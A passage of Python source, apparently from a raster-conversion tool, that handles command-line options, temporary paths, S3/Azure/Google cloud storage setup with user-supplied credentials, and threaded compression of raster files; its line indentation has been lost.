g_rpt = Report(self._base)
if (not g_rpt.init(_project_path, self._args.input if self._args.input else cfg.getValue(CIN_S3_PARENTFOLDER if inAmazon else CIN_AZURE_PARENTFOLDER, False))):
self._base.message(
'Unable to init (Report)', self._base.const_critical_text)
return(terminate(self._base, eFAIL))
g_is_generate_report = True
if (self._args.op == COP_UPL):
self._args.cloudupload = 'true'
self._args.tempoutput = self._args.input if os.path.isdir(
self._args.input) else os.path.dirname(self._args.input)
if (cfg.getValue(CLOAD_RESTORE_POINT) and
_rpt):
if (CRESUME_HDR_INPUT not in _rpt._header):
return(terminate(self._base, eFAIL))
self._args.tempoutput = _rpt._header[CRESUME_HDR_INPUT]
# read-in <Mode>
cfg_mode = cfg.getValue('Mode')
# fix the slashes to force a convention
if (self._args.input):
self._args.input = self._base.convertToForwardSlash(self._args.input,
not (self._args.input.lower().endswith(Report.CJOB_EXT) or cfg_mode == BundleMaker.CMODE))
if (self._args.output):
self._args.output = self._base.convertToForwardSlash(
self._args.output)
if (self._args.cache):
self._args.cache = self._base.convertToForwardSlash(
self._args.cache)
# ends
# read in (interleave)
if (cfg.getValue(CCFG_INTERLEAVE) is None):
cfg.setValue(CCFG_INTERLEAVE, 'PIXEL')
# ends
# overwrite (Out_CloudUpload, IncludeSubdirectories) with cmd-line args if defined.
if (self._args.cloudupload or self._args.s3output):
cfg.setValue(CCLOUD_UPLOAD, self._base.getBooleanValue(self._args.cloudupload)
if self._args.cloudupload else self._base.getBooleanValue(self._args.s3output))
cfg.setValue(CCLOUD_UPLOAD_OLD_KEY, cfg.getValue(CCLOUD_UPLOAD))
if (self._args.clouduploadtype):
self._args.clouduploadtype = self._args.clouduploadtype.lower()
cfg.setValue(COUT_CLOUD_TYPE, self._args.clouduploadtype)
is_cloud_upload = self._base.getBooleanValue(cfg.getValue(CCLOUD_UPLOAD)) if cfg.getValue(
CCLOUD_UPLOAD) else self._base.getBooleanValue(cfg.getValue(CCLOUD_UPLOAD_OLD_KEY))
if (is_cloud_upload):
if (self._args.output and
self._args.output.startswith('/')): # remove any leading '/' for http -output
self._args.output = self._args.output[1:]
# for backward compatibility (-s3output)
if (not cfg.getValue(CCLOUD_UPLOAD)):
cfg.setValue(CCLOUD_UPLOAD, is_cloud_upload)
if (not cfg.getValue(COUT_CLOUD_TYPE)):
cfg.setValue(COUT_CLOUD_TYPE, CCLOUD_AMAZON)
# ends
if (self._args.subs is not None):
cfg.setValue('IncludeSubdirectories',
getBooleanValue(self._args.subs))
# ends
# do we have -tempinput path to copy rasters first before conversion.
is_input_temp = False
if (self._args.tempinput):
self._args.tempinput = self._base.convertToForwardSlash(
self._args.tempinput)
if (not os.path.isdir(self._args.tempinput)):
try:
makedirs(self._args.tempinput)
except Exception as exp:
self._base.message('Unable to create the -tempinput path (%s) [%s]' % (
self._args.tempinput, str(exp)), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
is_input_temp = True # flag flows to deal with -tempinput
cfg.setValue(CISTEMPINPUT, is_input_temp)
cfg.setValue(CTEMPINPUT, self._args.tempinput)
# ends
# let's setup -tempoutput
is_output_temp = False
if (not self._args.tempoutput):
if (self._args.op and
self._args.op.startswith(COP_LAMBDA)):
# -tempoutput is not required when -cloudupload=true with -op=lambda.
self._args.tempoutput = '/tmp/'
# This is to suppress warnings or false alarms when reusing the .orjob file without the # -tempoutput key in header with the -clouduplaod=true.
if (self._args.tempoutput):
self._args.tempoutput = self._base.convertToForwardSlash(
self._args.tempoutput)
if (not os.path.isdir(self._args.tempoutput)):
# attempt to create the -tempoutput
try:
if (not self._args.op or
(self._args.op and
self._args.op != COP_UPL) and
self._args.op and
not self._args.op.startswith(COP_LAMBDA)):
makedirs(self._args.tempoutput)
except Exception as exp:
self._base.message('Unable to create the -tempoutput path (%s)\n[%s]' % (
self._args.tempoutput, str(exp)), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
# ends
is_output_temp = True
cfg.setValue(CISTEMPOUTPUT, is_output_temp)
cfg.setValue(CTEMPOUTPUT, self._args.tempoutput)
# ends
# import boto modules only when required. This allows users to run the program for only local file operations.
if ((inAmazon and
isinput_s3) or
(getBooleanValue(cfg.getValue(CCLOUD_UPLOAD)) and
cfg.getValue(COUT_CLOUD_TYPE) == CCLOUD_AMAZON)):
cfg.setValue(CCFG_PRIVATE_INC_BOTO, True)
try:
global boto3
import boto3
except BaseException:
self._base.message('\n%s requires the (boto3) module to run its S3 specific operations. Please install (boto3) for python.' % (
self.__program_name__), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
# ends
# take care of missing -input and -output if -clouddownload==True
# Note/Warning: S3/Azure inputs/outputs are case-sensitive hence wrong (case) could mean no files found on S3/Azure
if (isinput_s3):
_cloudInput = self._args.input
if (not _cloudInput):
_cloudInput = cfg.getValue(
CIN_S3_PARENTFOLDER if inAmazon else CIN_AZURE_PARENTFOLDER, False)
if (_cloudInput):
self._args.input = _cloudInput = _cloudInput.strip().replace('\\', '/')
cfg.setValue(CIN_S3_PARENTFOLDER, _cloudInput)
if (is_cloud_upload):
if (not is_output_temp):
if ((self._args.op and self._args.op != COP_UPL) or
not self._args.op and
(_rpt and
_rpt.operation != COP_UPL)):
self._base.message(
'-tempoutput must be specified if -cloudupload=true', self._base.const_critical_text)
return(terminate(self._base, eFAIL))
_access = cfg.getValue(COUT_AZURE_ACCESS)
if (_access):
if (_access not in ('private', 'blob', 'container')):
self._base.message('Invalid value for ({})'.format(
COUT_AZURE_ACCESS), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
# private is not recognized by Azure, used internally only for clarity
if (_access == 'private'):
# None == private container
cfg.setValue(COUT_AZURE_ACCESS, None)
if (self._args.output is None):
_cloud_upload_type = cfg.getValue(COUT_CLOUD_TYPE, True)
if (_cloud_upload_type == CCLOUD_AMAZON):
self._args.output = cfg.getValue(
COUT_S3_PARENTFOLDER, False)
elif (_cloud_upload_type == CCLOUD_AZURE):
self._args.output = cfg.getValue(
COUT_AZURE_PARENTFOLDER, False)
else:
self._base.message('Invalid value for ({})'.format(
COUT_CLOUD_TYPE), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
if (self._args.output):
self._args.output = self._args.output.strip().replace('\\', '/')
cfg.setValue(COUT_S3_PARENTFOLDER, self._args.output)
# ends
if (not self._args.output or
not self._args.input):
if ((not self._args.op and
not self._args.input) or
(self._args.op and
not self._args.input)):
self._base.message(
'-input/-output is not specified!', self._base.const_critical_text)
return(terminate(self._base, eFAIL))
# set output in cfg.
dst_ = self._base.convertToForwardSlash(self._args.output)
cfg.setValue(CCFG_PRIVATE_OUTPUT, dst_ if dst_ else '')
# ends
# is -rasterproxypath/-clonepath defined at the cmd-line?
if (self._args.rasterproxypath):
# -rasterproxypath takes precedence. -clonepath is now deprecated.
self._args.clonepath = self._args.rasterproxypath
if (self._args.clonepath or
cfg_mode == 'rasterproxy'):
rpPath = self._args.clonepath if self._args.clonepath else self._args.output
if (rpPath[-4:].lower().endswith('.csv')):
cfg.setValue('rpformat', 'csv')
cfg.setValue(
'rpfname', self._base.convertToForwardSlash(rpPath, False))
if (self._args.clonepath):
self._args.clonepath = os.path.dirname(rpPath)
else: # if createrasterproxy template is used, -output is the -rasterproxypath
self._args.output = os.path.dirname(rpPath)
if (self._args.clonepath):
self._args.clonepath = self._base.convertToForwardSlash(
self._args.clonepath)
cfg.setValue(CCLONE_PATH, self._args.clonepath)
# ends
# cache path
if (self._args.cache):
cfg.setValue(CCACHE_PATH, self._args.cache)
# ends
# read in build pyramids value
do_pyramids = 'true'
if (not self._args.pyramids):
self._args.pyramids = cfg.getValue('BuildPyramids')
if (self._args.pyramids):
do_pyramids = self._args.pyramids = str(
self._args.pyramids).lower()
# ends
# set jpeg_quality from cmd to override cfg value. Must be set before compression->init()
if (self._args.quality):
cfg.setValue('Quality', self._args.quality)
if (self._args.prec):
cfg.setValue('LERCPrecision', self._args.prec)
if (self._args.pyramids):
if (self._args.pyramids == CCMD_PYRAMIDS_ONLY):
# -input, -output path check isn't done if -input points to a job (.orjob) file
if (not cfg.getValue(CLOAD_RESTORE_POINT)):
if (self._args.input != self._args.output):
# in case of input s3, output is used as a temp folder locally.
if (isinput_s3):
if (getBooleanValue(cfg.getValue(CCLOUD_UPLOAD))):
if (cfg.getValue(COUT_S3_PARENTFOLDER, False) != cfg.getValue(CIN_S3_PARENTFOLDER, False)):
self._base.message('<%s> and <%s> must be the same if the -pyramids=only' % (
CIN_S3_PARENTFOLDER, COUT_S3_PARENTFOLDER), const_critical_text)
return(terminate(self._base, eFAIL))
else:
self._base.message(
'-input and -output paths must be the same if the -pyramids=only', const_critical_text)
return(terminate(self._base, eFAIL))
if (not getBooleanValue(do_pyramids) and
do_pyramids != CCMD_PYRAMIDS_ONLY and
do_pyramids != CCMD_PYRAMIDS_EXTERNAL and
do_pyramids != CCMD_PYRAMIDS_SOURCE):
do_pyramids = 'false'
cfg.setValue('Pyramids', do_pyramids)
cfg.setValue('isuniformscale', True if do_pyramids == CCMD_PYRAMIDS_ONLY else getBooleanValue(
do_pyramids) if do_pyramids != CCMD_PYRAMIDS_SOURCE else CCMD_PYRAMIDS_SOURCE)
# ends
# read in the gdal_path from config.
# note: validity is checked within (compression-mod)
gdal_path = cfg.getValue(CCFG_GDAL_PATH, False)
# ends
comp = Compression(gdal_path, base=self._base)
# warning/error messages get printed within .init()
ret = comp.init(0)
if (not ret):
self._base.message(
'Unable to initialize/compression module', self._base.const_critical_text)
return(terminate(self._base, eFAIL))
# s3 upload settings.
out_s3_profile_name = self._args.outputprofile
if (not out_s3_profile_name):
out_s3_profile_name = cfg.getValue('Out_S3_AWS_ProfileName', False)
if (out_s3_profile_name):
cfg.setValue('Out_S3_AWS_ProfileName', out_s3_profile_name)
s3_output = cfg.getValue(COUT_S3_PARENTFOLDER, False)
inputClientIdEnvToRead = {
Store.TypeAmazon: 'AWS_ACCESS_KEY_ID',
Store.TypeAzure: 'AZURE_STORAGE_ACCOUNT',
Store.TypeGoogle: None
}
inputClientSecretEnvToRead = {
Store.TypeAmazon: 'AWS_SECRET_ACCESS_KEY',
Store.TypeAzure: 'AZURE_STORAGE_ACCESS_KEY',
Store.TypeGoogle: None
}
outputClientIdEnvToRead = {
Store.TypeAmazon: 'OR_OUT_AWS_ACCESS_KEY_ID',
Store.TypeAzure: 'OR_OUT_AZURE_STORAGE_ACCOUNT',
Store.TypeGoogle: None
}
outputClientSecretEnvToRead = {
Store.TypeAmazon: 'OR_OUT_AWS_SECRET_ACCESS_KEY',
Store.TypeAzure: 'OR_OUT_AZURE_STORAGE_ACCESS_KEY',
Store.TypeGoogle: None
}
s3_id = cfg.getValue('Out_S3_ID', False)
s3_secret = cfg.getValue('Out_S3_Secret', False)
cloudUploadType = cfg.getValue(COUT_CLOUD_TYPE, True)
if (not s3_id):
s3_id = os.environ[outputClientIdEnvToRead[cloudUploadType]
] if outputClientIdEnvToRead[cloudUploadType] in os.environ else None
if (not s3_secret):
s3_secret = os.environ[outputClientSecretEnvToRead[cloudUploadType]
] if outputClientSecretEnvToRead[cloudUploadType] in os.environ else None
err_init_msg = 'Unable to initialize the ({}) upload module! Check module setup/credentials. Quitting..'
if (self._base.getBooleanValue(cfg.getValue(CCLOUD_UPLOAD))):
if (cloudUploadType == CCLOUD_AMAZON):
if ((s3_output is None and self._args.output is None)):
self._base.message('Empty/Invalid values detected for keys in the ({}) beginning with (Out_S3|Out_S3_ID|Out_S3_Secret|Out_S3_AWS_ProfileName) or values for command-line args (-outputprofile)'.format(
self._args.config), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
# instance of upload storage.
S3_storage = S3Storage(self._base)
if (self._args.output):
s3_output = self._args.output
cfg.setValue(COUT_S3_PARENTFOLDER, s3_output)
# do we overwrite the output_bucekt_name with cmd-line?
if (self._args.outputbucket):
cfg.setValue('Out_S3_Bucket', self._args.outputbucket)
# end
ret = S3_storage.init(
s3_output, s3_id, s3_secret, CS3STORAGE_OUT)
if (not ret):
self._base.message(err_init_msg.format(
'S3'), const_critical_text)
return(terminate(self._base, eFAIL))
S3_storage.inputPath = self._args.output
domain = S3_storage.con.meta.client.generate_presigned_url(
'get_object', Params={'Bucket': S3_storage.m_bucketname, 'Key': ' '}).split('%20?')[0]
cfg.setValue(COUT_VSICURL_PREFIX, '/vsicurl/{}{}'.format(domain.replace('https', 'http'),
cfg.getValue(COUT_S3_PARENTFOLDER, False)) if not S3_storage._isBucketPublic else
'/vsicurl/http://{}.{}/{}'.format(S3_storage.m_bucketname, CINOUT_S3_DEFAULT_DOMAIN, cfg.getValue(COUT_S3_PARENTFOLDER, False)))
# ends
elif (cfg.getValue(COUT_CLOUD_TYPE, True) == CCLOUD_AZURE):
_account_name = cfg.getValue(COUT_AZURE_ACCOUNTNAME, False)
_account_key = cfg.getValue(COUT_AZURE_ACCOUNTKEY, False)
if (not _account_name):
_account_name = s3_id
if (not _account_key):
_account_key = s3_secret
_container = cfg.getValue(COUT_AZURE_CONTAINER)
_out_profile = cfg.getValue(COUT_AZURE_PROFILENAME, False)
if (self._args.outputbucket):
_container = self._args.outputbucket
outBucket = self._args.outputbucket.lower()
cfg.setValue(COUT_AZURE_CONTAINER,
outBucket) # lowercased
# UpdateMRF/update uses 'Out_S3_Bucket'/Generic key name to read in the output bucket name.
cfg.setValue('Out_S3_Bucket', outBucket)
if (self._args.outputprofile):
_out_profile = self._args.outputprofile
cfg.setValue(COUT_AZURE_PROFILENAME, _out_profile)
bOutToken = False
if (_account_name and
_account_name.lower().startswith('https:')):
bOutToken = True
if (((not _account_name or
not _account_key) and
not _out_profile) or
not _container):
if (not bOutToken):
self._base.message('Empty/Invalid values detected for keys ({}/{}/{}/{})'.format(COUT_AZURE_ACCOUNTNAME,
COUT_AZURE_ACCOUNTKEY, COUT_AZURE_CONTAINER, COUT_AZURE_PROFILENAME), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
azure_storage = Azure(
_account_name, _account_key, _out_profile, self._base)
if (not azure_storage.init(CS3STORAGE_OUT)):
self._base.message(err_init_msg.format(
CCLOUD_AZURE.capitalize()), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
cfg.setValue(COUT_VSICURL_PREFIX, '/vsicurl/{}{}'.format('{}/{}/'.format(azure_storage.getAccountName, _container),
self._args.output if self._args.output else cfg.getValue(COUT_S3_PARENTFOLDER, False)))
elif (cfg.getValue(COUT_CLOUD_TYPE, True) == Store.TypeGoogle):
_bucket = cfg.getValue(COUT_GOOGLE_BUCKET) # bucket name
_out_profile = cfg.getValue(COUT_GOOGLE_PROFILENAME, False)
if (self._args.outputbucket):
_bucket = self._args.outputbucket
# lowercased
cfg.setValue(COUT_GOOGLE_BUCKET,
self._args.outputbucket.lower())
if (self._args.outputprofile):
_out_profile = self._args.outputprofile
cfg.setValue(COUT_GOOGLE_PROFILENAME, _out_profile)
if (not _out_profile or
not _bucket):
self._base.message('Empty/Invalid values detected for keys ({}/{})'.format(
COUT_GOOGLE_BUCKET, COUT_GOOGLE_PROFILENAME), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
google_storage = Google(None, '', '', _out_profile, self._base)
if (not google_storage.init(_bucket)):
self._base.message(err_init_msg.format(
Store.TypeGoogle.capitalize()), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
cfg.setValue(COUT_VSICURL_PREFIX, '/vsicurl/{}/{}'.format('{}{}'.format(Google.DafaultStorageDomain,
_bucket), self._args.output if self._args.output else cfg.getValue(COUT_GOOGLE_PARENTFOLDER, False)))
else:
self._base.message('Invalid value for ({})'.format(
COUT_CLOUD_TYPE), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
isDeleteAfterUpload = cfg.getValue(COUT_DELETE_AFTER_UPLOAD)
if (isDeleteAfterUpload is None):
isDeleteAfterUpload = cfg.getValue(
COUT_DELETE_AFTER_UPLOAD_OBSOLETE)
isDeleteAfterUpload = self._base.getBooleanValue(isDeleteAfterUpload)
user_args_Callback = {
USR_ARG_UPLOAD: self._base.getBooleanValue(cfg.getValue(CCLOUD_UPLOAD)),
USR_ARG_DEL: isDeleteAfterUpload
}
# ends
cpy = Copy(self._base)
list = {
'copy': {'*'},
'exclude': {}
}
for i in cfg.getValue(CCFG_RASTERS_NODE) + cfg.getValue(CCFG_EXCLUDE_NODE):
list['exclude'][i] = ''
is_caching = False
if (cfg_mode == 'clonemrf' or
cfg_mode == 'splitmrf' or
cfg_mode == 'cachingmrf' or
cfg_mode == 'rasterproxy'):
is_caching = True
if (is_caching):
cfg.setValue(CISTEMPINPUT, False)
cfg.setValue('Pyramids', False)
callbacks = {
# 'copy' : copy_callback,
'exclude': exclude_callback
}
callbacks_for_meta = {
'exclude': exclude_callback_for_meta
}
CONST_CPY_ERR_0 = 'Unable to initialize (Copy) module!'
CONST_CPY_ERR_1 = 'Unable to process input data/(Copy) module!'
# keep original-source-ext
cfg_keep_original_ext = self._base.getBooleanValue(
cfg.getValue('KeepExtension'))
cfg_threads = cfg.getValue('Threads')
msg_threads = 'Thread-count invalid/undefined, resetting to default'
try:
cfg_threads = int(cfg_threads) # (None) value is expected
except BaseException:
cfg_threads = -1
if (cfg_threads <= 0 or
(cfg_threads > CCFG_THREADS and
not is_caching)):
cfg_threads = CCFG_THREADS
self._base.message('%s(%s)' % (
msg_threads, CCFG_THREADS), self._base.const_warning_text)
# ends
# let's deal with copying when -input is on s3
storeUseToken = cfg.getValue('UseToken')
isUseToken = self._args.usetoken if self._args.usetoken else storeUseToken
if (not isUseToken):
isUseToken = self._base.getUserConfiguration.getValue(UseToken)
cfg.setValue(UseToken, self._base.getBooleanValue(isUseToken))
if (isinput_s3):
cfg.setValue('iss3', True)
in_s3_parent = cfg.getValue(CIN_S3_PARENTFOLDER, False)
in_s3_profile_name = self._args.inputprofile
if (not in_s3_profile_name):
inputProfileKeyToRead = {
Store.TypeAmazon: 'In_S3_AWS_ProfileName',
Store.TypeAzure: 'In_Azure_ProfileName',
Store.TypeGoogle: 'In_Google_ProfileName'
}
in_s3_profile_name = cfg.getValue(
inputProfileKeyToRead[cloudDownloadType], False)
if (in_s3_profile_name):
cfg.setValue('In_S3_AWS_ProfileName', in_s3_profile_name)
inputClientIdKeyToRead = {
Store.TypeAmazon: 'In_S3_ID',
Store.TypeAzure: 'In_Azure_AccountName',
Store.TypeGoogle: None
}
inputClientSecretKeyToRead = {
Store.TypeAmazon: 'In_S3_Secret',
Store.TypeAzure: 'In_Azure_AccountKey',
Store.TypeGoogle: None
}
in_s3_id = cfg.getValue(
inputClientIdKeyToRead[cloudDownloadType], False)
in_s3_secret = cfg.getValue(
inputClientSecretKeyToRead[cloudDownloadType], False)
if (not in_s3_id):
in_s3_id = os.environ[inputClientIdEnvToRead[cloudDownloadType]
] if inputClientIdEnvToRead[cloudDownloadType] in os.environ else None
in_s3_secret = os.environ[inputClientSecretEnvToRead[cloudDownloadType]
] if inputClientSecretEnvToRead[cloudDownloadType] in os.environ else None
in_s3_bucket = self._args.inputbucket
if (not in_s3_bucket):
inputBucketKeyToRead = {
Store.TypeAmazon: 'In_S3_Bucket',
Store.TypeAzure: 'In_Azure_Container',
Store.TypeGoogle: 'In_Google_Bucket'
}
in_s3_bucket = cfg.getValue(
inputBucketKeyToRead[cloudDownloadType], False)
if (in_s3_parent is None or
in_s3_bucket is None):
if (_rpt and
not _rpt._isInputHTTP):
self._base.message(
'Invalid/empty value(s) found in node(s) [In_S3_ParentFolder, In_S3_Bucket]', self._base.const_critical_text)
return(terminate(self._base, eFAIL))
# update (in s3 bucket name in config)
cfg.setValue('In_S3_Bucket', in_s3_bucket)
in_s3_parent = in_s3_parent.replace('\\', '/')
if (in_s3_parent[:1] == '/' and
not in_s3_parent.lower().endswith(Report.CJOB_EXT)):
in_s3_parent = in_s3_parent[1:]
cfg.setValue(CIN_S3_PARENTFOLDER, in_s3_parent)
if (cloudDownloadType == Store.TypeAmazon):
o_S3_storage = S3Storage(self._base)
ret = o_S3_storage.init(
in_s3_parent, in_s3_id, in_s3_secret, CS3STORAGE_IN)
if (not ret):
self._base.message(
'Unable to initialize S3-storage! Quitting..', self._base.const_critical_text)
return(terminate(self._base, eFAIL))
# handles EMC namespace cloud urls differently
if (str(o_S3_storage.con.meta.client._endpoint.host).lower().endswith('.ecstestdrive.com')):
cfg.setValue(CIN_S3_PREFIX, '/vsicurl/http://{}.public.ecstestdrive.com/{}/'.format(
o_S3_storage.CAWS_ACCESS_KEY_ID.split('@')[0], o_S3_storage.m_bucketname))
else: # for all other standard cloud urls
domain = o_S3_storage.con.meta.client.generate_presigned_url(
'get_object', Params={'Bucket': o_S3_storage.m_bucketname, 'Key': ' '}).split('%20?')[0]
cfg.setValue(CIN_S3_PREFIX, '/vsicurl/{}'.format(domain.replace('https', 'http')) if not o_S3_storage._isBucketPublic else
'/vsicurl/http://{}.{}/'.format(o_S3_storage.m_bucketname, CINOUT_S3_DEFAULT_DOMAIN)) # vsicurl doesn't like 'https'
o_S3_storage.inputPath = self._args.output
if (not o_S3_storage.getS3Content(o_S3_storage.remote_path, o_S3_storage.S3_copy_to_local, exclude_callback)):
self._base.message(
'Unable to read S3-Content', self._base.const_critical_text)
return(terminate(self._base, eFAIL))
elif (cloudDownloadType == Store.TypeAzure):
# let's do (Azure) init
self._base.getUserConfiguration.setValue(
CIN_AZURE_CONTAINER, in_s3_bucket)
in_azure_storage = Azure(
in_s3_id, in_s3_secret, in_s3_profile_name, self._base)
if (not in_azure_storage.init() or
not in_azure_storage.getAccountName):
self._base.message('({}) download initialization error. Check input credentials/profile name. Quitting..'.format(
CCLOUD_AZURE.capitalize()), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
in_azure_storage._include_subFolders = self._base.getBooleanValue(
cfg.getValue('IncludeSubdirectories'))
_restored = cfg.getValue(CLOAD_RESTORE_POINT)
_azParent = self._args.input
if (not _restored):
in_azure_storage._mode = in_azure_storage.CMODE_SCAN_ONLY
else:
_azParent = '/' if not _rpt else _rpt.root
if (not _azParent.endswith('/')):
_azParent += '/'
cfg.setValue(CIN_AZURE_PARENTFOLDER, _azParent)
cfg.setValue(CIN_S3_PREFIX, '/vsicurl/{}'.format('{}/{}/'.format(
in_azure_storage.getAccountName, cfg.getValue('In_S3_Bucket'))))
if (not in_azure_storage.browseContent(in_s3_bucket, _azParent, in_azure_storage.copyToLocal, exclude_callback)):
return(terminate(self._base, eFAIL))
if (not _restored):
_files = in_azure_storage.getBrowseContent()
if (_files):
for f in _files:
fn_collect_input_files(f)
elif (cloudDownloadType == Store.TypeGoogle):
inGoogleStorage = Google(
None, in_s3_id, in_s3_secret, in_s3_profile_name, self._base)
if (not inGoogleStorage.init(in_s3_bucket)):
self._base.message('({}) download initialization error. Check input credentials/profile name. Quitting..'.format(
Store.TypeGoogle.capitalize()), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
inGoogleStorage._include_subFolders = self._base.getBooleanValue(
cfg.getValue('IncludeSubdirectories'))
restored = cfg.getValue(CLOAD_RESTORE_POINT)
gsParent = self._args.input
if (not restored):
inGoogleStorage._mode = inGoogleStorage.CMODE_SCAN_ONLY
else:
gsParent = '/' if not _rpt else _rpt.root
if (not gsParent.endswith('/')):
gsParent += '/'
cfg.setValue(CIN_GOOGLE_PARENTFOLDER, gsParent)
cfg.setValue(CIN_S3_PREFIX, '/vsicurl/{}'.format(
'{}{}/'.format(Google.DafaultStorageDomain, self._args.inputbucket)))
if (not inGoogleStorage.browseContent(in_s3_bucket, gsParent, inGoogleStorage.copyToLocal, exclude_callback)):
return(terminate(self._base, eFAIL))
if (not restored):
_files = inGoogleStorage.getBrowseContent()
if (_files):
for f in _files:
fn_collect_input_files(f)
pass
# ends
# ends
# control flow if conversions required.
if (not is_caching):
isDirectInput = filterPaths(
self._args.input, cfg.getValue(CCFG_RASTERS_NODE))
if (not isinput_s3 and
not cfg_mode == BundleMaker.CMODE and
not isDirectInput):
ret = cpy.init(self._args.input, self._args.tempoutput if is_output_temp and self._base.getBooleanValue(
cfg.getValue(CCLOUD_UPLOAD)) else self._args.output, list, callbacks, cfg)
if (not ret):
self._base.message(
CONST_CPY_ERR_0, self._base.const_critical_text)
return(terminate(self._base, eFAIL))
ret = cpy.processs(self._base.S3Upl if is_cloud_upload else None,
user_args_Callback, fn_pre_process_copy_default)
if (not ret):
self._base.message(
CONST_CPY_ERR_1, self._base.const_critical_text)
return(terminate(self._base, eFAIL))
if (is_input_temp):
pass # no post custom code yet for non-rasters
if (cfg_mode == BundleMaker.CMODE):
p, f = os.path.split(self._args.input if not cfg.getValue(
CLOAD_RESTORE_POINT) else self._base.convertToForwardSlash(_rpt._input_list[0], False))
raster_buff = [{'dst': self._args.output,
'f': f,
'src': p}]
files = raster_buff
files_len = len(files)
if (files_len):
if (is_input_temp and
not isinput_s3 and
not cfg.getValue(CLOAD_RESTORE_POINT)):
# if the -tempinput path is defined, we first copy rasters from the source path to -tempinput before any conversion.
self._base.message(
'Copying files to -tempinput path (%s)' % (cfg.getValue(CTEMPINPUT, False)))
cpy_files_ = []
for i in range(0, len(files)):
get_dst_path = files[i]['dst'].replace(self._args.output if cfg.getValue(
CTEMPOUTPUT, False) is None else cfg.getValue(CTEMPOUTPUT, False), cfg.getValue(CTEMPINPUT, False))
cpy_files_.append(
{
'src': files[i]['src'],
'dst': get_dst_path,
'f': files[i]['f']
})
files[i]['src'] = get_dst_path
cpy.batch(cpy_files_, None)
self._base.message('Converting..')
# collect all the input raster files.
if (g_is_generate_report and
g_rpt):
for req in files:
_src = '{}{}{}'.format(req['src'], '/' if not req['src'].replace(
'\\', '/').endswith('/') and req['src'] else '', req['f'])
if (self._base.getBooleanValue(cfg.getValue(CISTEMPINPUT))):
_tempinput = cfg.getValue(CTEMPINPUT, False)
_tempinput = _tempinput[:-1] if _tempinput.endswith(
'/') and not self._args.input.endswith('/') else _tempinput
_src = _src.replace(_tempinput, self._args.input)
# prior to this point, rasters get added to g_rpt during the (pull/copy) process if -clouddownload=true && -tempinput is defined.
g_rpt.addFile(_src)
self._base.message('{}'.format(
CRESUME_CREATE_JOB_TEXT).format(_project_path))
for arg in vars(self._args):
val = getattr(self._args, arg)
if (arg == CRESUME_HDR_INPUT):
f, e = os.path.splitext(val)
if (len(e) != 0):
val = val[:val.rindex('/') + 1]
g_rpt.addHeader(arg, val)
g_rpt.write()
if (self.isOperationCreateJob):
return self.__initOperationCreateJob()
# process @ lambda?
if (self._isLambdaJob()):
_rpt = Report(self._base)
if (not _rpt.init(_project_path) or
not _rpt.read()):
self._base.message('Unable to read the -input report file ({})'.format(
self._args.input), self._base.const_critical_text)
return(terminate(self._base, eFAIL))
self._base.getUserConfiguration.setValue(
CPRT_HANDLER, _rpt)
ret = eOK if self._runLambdaJob(
g_rpt._report_file) else eFAIL
if (ret == eOK):
if (self._args.op != COP_LAMBDA): # synchronous call.
self._moveJobFileToLogPath()
return(terminate(self._base, ret))
# ends
self._args.op = None
self._args.input = _project_path
cfg.setValue(CLOAD_RESTORE_POINT, True)
self.run()
return
# ends
raster_buff = files
len_buffer = cfg_threads
threads = []
store_files_indx = 0
store_files_len = len(raster_buff)
while(1):
len_threads = len(threads)
while(len_threads):
alive = [t.is_alive() for t in threads]
cnt_dead = sum(not x for x in alive)
if (cnt_dead):
len_buffer = cnt_dead
threads = [t for t in threads if t.is_alive()]
break
buffer = []
for i in range(0, len_buffer):
if (store_files_indx == store_files_len):
break
buffer.append(raster_buff[store_files_indx])
store_files_indx += 1
if (not buffer and
not threads):
break
for req in buffer:
(input_file, output_file) = getInputOutput(
req['src'], req['dst'], req['f'], isinput_s3)
f, e = os.path.splitext(output_file)
if (not cfg_keep_original_ext):
modeExtension = cfg_mode.split('_')[0]
if (modeExtension.lower() == e[1:].lower()):
# keep the input extension case. This will ensure the file status gets updated properly in the orjob file.
modeExtension = e[1:]
output_file = output_file.replace(
e, '.{}'.format(modeExtension))
_build_pyramids = True
if (til):
if (til.find(req['f'])):
# increment the process counter if the raster belongs to a (til) file.
til.addFileToProcessed(req['f'])
# build pyramids is always turned off for rasters that belong to (.til) files.
_build_pyramids = False
useBundleMaker = cfg_mode == BundleMaker.CMODE
if (useBundleMaker):
bundleMaker = BundleMaker(
input_file, gdal_path, base=self._base)
if (not bundleMaker.init()):
continue
t = threading.Thread(target=bundleMaker.run)
else:
doProcessRaster = True
if (til is not None and
til.defaultTILProcessing and
til.fileTILRelated(os.path.basename(input_file))):
# skip processing individual rasters/tiffs referenced by the .til files. Ask GDAL to process .til without any custom OR logic involved.
doProcessRaster = False
if (not isinput_s3):
processedPath = output_file
if (self._base.getBooleanValue(cfg.getValue(CISTEMPOUTPUT))):
if (not is_cloud_upload):
processedPath = processedPath.replace(
req['dst'], self._args.output)
if (self._base.getBooleanValue(cfg.getValue(CISTEMPINPUT))):
try:
shutil.move(input_file, processedPath)
except Exception as e:
self._base.message('TIL/[MV] ({})->({})\n{}'.format(
input_file, processedPath, str(e)), self._base.const_critical_text)
else:
try:
shutil.copy(input_file, processedPath)
except Exception as e:
self._base.message('TIL/[CPY] ({})->({})\n{}'.format(
input_file, processedPath, str(e)), self._base.const_critical_text)
if (doProcessRaster):
t = threading.Thread(target=comp.compress,
args=(input_file, output_file, args_Callback, _build_pyramids, self._base.S3Upl if is_cloud_upload else fn_copy_temp_dst if is_output_temp and not is_cloud_upload else None, user_args_Callback), kwargs={'name': os.path.join(req['src'], req['f'])})
t.daemon = True
t.start()
threads.append(t)
# til work
if (til):
for _til in til:
_doPostProcessing = True
if (cfg.getValue(CLOAD_RESTORE_POINT)):
if (_rpt.getRecordStatus(_til, CRPT_PROCESSED) == CRPT_YES):
self._base.message('{} {}'.format(
CRESUME_MSG_PREFIX, _til))
_doPostProcessing = False
